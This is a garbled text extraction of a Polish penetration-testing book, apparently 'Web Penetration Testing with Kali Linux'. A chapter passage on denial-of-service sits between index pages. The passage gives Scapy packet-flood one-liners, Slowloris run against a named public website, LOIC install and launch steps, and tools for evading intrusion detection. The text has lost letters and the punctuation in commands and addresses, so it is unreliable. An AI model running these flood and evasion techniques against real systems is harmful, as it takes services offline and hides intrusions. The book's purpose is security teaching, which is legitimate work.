142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 37: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

